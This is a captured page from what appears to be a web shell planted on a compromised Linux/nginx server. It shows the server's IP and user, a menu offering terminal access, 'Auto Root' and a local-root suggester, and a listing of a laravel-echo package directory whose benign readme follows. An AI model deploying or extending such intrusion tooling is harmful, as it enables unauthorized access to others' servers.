Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 18.188.80.46
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
unp-musonza /
node_modules /
laravel-echo /
Delete
Unzip
Name
Size
Permission
Date
Action
dist
[ DIR ]
drwxr-xr-x
2021-02-04 21:24
src
[ DIR ]
drwxr-xr-x
2021-02-04 21:24
tests
[ DIR ]
drwxr-xr-x
2021-02-04 21:24
typings
[ DIR ]
drwxr-xr-x
2021-02-04 21:24
.editorconfig
252
B
-rw-r--r--
1985-10-26 08:15
.gitattributes
143
B
-rw-r--r--
1985-10-26 08:15
.travis.yml
41
B
-rw-r--r--
1985-10-26 08:15
LICENSE.txt
1.05
KB
-rw-r--r--
1985-10-26 08:15
package.json
2.17
KB
-rw-r--r--
2021-02-04 21:24
readme.md
1009
B
-rw-r--r--
1985-10-26 08:15
rollup.config.js
436
B
-rw-r--r--
1985-10-26 08:15
tsconfig.json
446
B
-rw-r--r--
1985-10-26 08:15
Save
Rename
<p align="center"><img src="https://laravel.com/assets/img/components/logo-echo.svg"></p> ## Introduction In many modern web applications, WebSockets are used to implement realtime, live-updating user interfaces. When some data is updated on the server, a message is typically sent over a WebSocket connection to be handled by the client. This provides a more robust, efficient alternative to continually polling your application for changes. To assist you in building these types of applications, Laravel makes it easy to "broadcast" your events over a WebSocket connection. Broadcasting your Laravel events allows you to share the same event names between your server-side code and your client-side JavaScript application. Laravel Echo is a JavaScript library that makes it painless to subscribe to channels and listen for events broadcast by Laravel. You may install Echo via the NPM package manager. ## Documentation Official documentation [is located here](https://laravel.com/docs/broadcasting).